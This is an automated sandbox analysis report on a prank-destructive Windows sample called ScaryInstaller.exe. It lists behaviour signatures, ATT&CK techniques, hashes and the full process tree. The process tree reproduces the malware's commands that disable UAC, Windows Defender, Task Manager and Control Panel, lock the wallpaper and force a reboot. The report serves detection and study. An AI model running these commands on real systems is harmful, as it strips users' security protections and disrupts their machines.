Analysis
-
max time kernel
151s -
max time network
161s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-08-2024 22:32
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/pankoza2-pl/malwaredatabase-old
Resource
win11-20240802-en
Behavioral task
behavioral2
Sample
https://github.com/pankoza2-pl/malwaredatabase-old
Resource
macos-20240711.1-en
Errors
General
-
Target
https://github.com/pankoza2-pl/malwaredatabase-old
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 352 ScaryInstaller.exe 1636 CreepScreen.exe 252 melter.exe -
resource yara_rule behavioral1/files/0x000500000002ab12-343.dat upx behavioral1/memory/352-369-0x0000000000400000-0x0000000001DFD000-memory.dmp upx behavioral1/memory/352-404-0x0000000000400000-0x0000000001DFD000-memory.dmp upx behavioral1/memory/352-423-0x0000000000400000-0x0000000001DFD000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 38 raw.githubusercontent.com 40 raw.githubusercontent.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" reg.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\ScaryInstaller.exe:Zone.Identifier msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CreepScreen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScaryInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language melter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 708 timeout.exe 2528 timeout.exe 3320 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 3 IoCs
pid Process 4640 taskkill.exe 3432 taskkill.exe 1268 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "253" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 4600 reg.exe 656 reg.exe 2372 reg.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 253152.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\ScaryInstaller.exe:Zone.Identifier msedge.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 832 vlc.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 3188 msedge.exe 3188 msedge.exe 3192 msedge.exe 3192 msedge.exe 1448 identity_helper.exe 1448 identity_helper.exe 1892 msedge.exe 1892 msedge.exe 620 msedge.exe 620 msedge.exe 3688 msedge.exe 3688 msedge.exe 3688 msedge.exe 3688 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 832 vlc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 4640 taskkill.exe Token: SeDebugPrivilege 3432 taskkill.exe Token: SeDebugPrivilege 1268 taskkill.exe Token: 33 3784 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3784 AUDIODG.EXE Token: 33 832 vlc.exe Token: SeIncBasePriorityPrivilege 832 vlc.exe Token: SeShutdownPrivilege 3712 shutdown.exe Token: SeRemoteShutdownPrivilege 3712 shutdown.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 832 vlc.exe 832 vlc.exe 832 vlc.exe 832 vlc.exe 832 vlc.exe 832 vlc.exe 832 vlc.exe 832 vlc.exe -
Suspicious use of SendNotifyMessage 14 IoCs
pid Process 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe 3192 msedge.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1636 CreepScreen.exe 832 vlc.exe 832 vlc.exe 832 vlc.exe 832 vlc.exe 896 PickerHost.exe 1940 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3192 wrote to memory of 340 3192 msedge.exe 81 PID 3192 wrote to memory of 340 3192 msedge.exe 81 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 464 3192 msedge.exe 82 PID 3192 wrote to memory of 3188 3192 msedge.exe 83 PID 3192 wrote to memory of 3188 3192 msedge.exe 83 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84 PID 3192 wrote to memory of 2144 3192 msedge.exe 84
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb03e23cb8,0x7ffb03e23cc8,0x7ffb03e23cd82⤵PID:340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:22⤵PID:464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:82⤵PID:2144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:12⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:2380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:12⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:12⤵PID:3424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:12⤵PID:2968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:12⤵PID:5044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:12⤵PID:1956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6128 /prefetch:82⤵PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:620
-
-
C:\Users\Admin\Downloads\ScaryInstaller.exe"C:\Users\Admin\Downloads\ScaryInstaller.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:352 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\61EC.tmp\creep.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4004 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
C:\Users\Admin\AppData\Local\Temp\61EC.tmp\CreepScreen.exeCreepScreen.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1636
-
-
C:\Windows\SysWOW64\timeout.exetimeout 5 /nobreak4⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:708
-
-
C:\Users\Admin\AppData\Local\Temp\61EC.tmp\melter.exemelter.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:252
-
-
C:\Windows\SysWOW64\timeout.exetimeout 10 /nobreak4⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CreepScreen.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im melter.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\61EC.tmp\scarr.mp4"4⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:832
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f4⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:2456
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
- System Location Discovery: System Language Discovery
PID:4560
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4600
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:656
-
-
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
PID:3080
-
-
C:\Windows\SysWOW64\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2372
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:3252
-
-
C:\Windows\SysWOW64\net.exenet user Admin /fullname:"IT'S TOO LATE!!!"4⤵
- System Location Discovery: System Language Discovery
PID:4412 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"5⤵
- System Location Discovery: System Language Discovery
PID:4516
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 8 /nobreak4⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3320
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5960 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3688
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2932
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1872
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004D01⤵
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:896
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39cc855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1940
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD570e969d4a2b40aef8eb0736379c0bcfb
SHA1608c4fdf0e6b820eed23b793884e11210b32be58
SHA25682e6cd647225c2781d32207ca56e1bf5e85dddabdfdf67a469c6e8910062975c
SHA512e38f13e75d7a74400b1c21be8c5d8045c366078c4bfd7a25de86a872a22db8b383484c4f044d433f557ba3f181670398eeb7322fb6946a3bfff03875576b596d
-
Filesize
152B
MD5fc36221d3cc9a4657faeb51e3ea7023a
SHA122e3f8e68b2dd3992d544f8ca57c48c6878f77f9
SHA256f393d5cc1a1b59d1bf0f19ade21515652b60bdea4b2d11780b904eb90fdd7b4b
SHA5121d831b911b8e6970f3c829d7aed3c7d0faeb3f986fa029c8db8e2b2ced40898ad96b26311e620300ecd6d5a71f444582052b9ae11c4231224010096105bdb117
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
MD50189b12160bfb5d4cf817a3bb0a415d7
SHA103ac35ea0bc9089d320e972eb148c2fa80da811a
SHA256fdcecd4977cc68071404063bb31000c770337b2896d50625dddc81f3f727a580
SHA512c52e6fc8ca012fb2c14d02a0cdbec271ef3910583ff63311cbf89bd19c8c6faacb08926cd2f25f3f00b4d1d47a204d5d26539fe0896326ee1ec1d3a449a2d2a0
-
Filesize
496B
MD530322550d9f9c54f345ea1c71f3b2e8f
SHA1b5a3cff2995147279c2bbed7c03b2280ecb286e5
SHA2564e7798d8476361378f8fbfb0442db63c7f6bf7e1830d50808bfdb8a58700d8f9
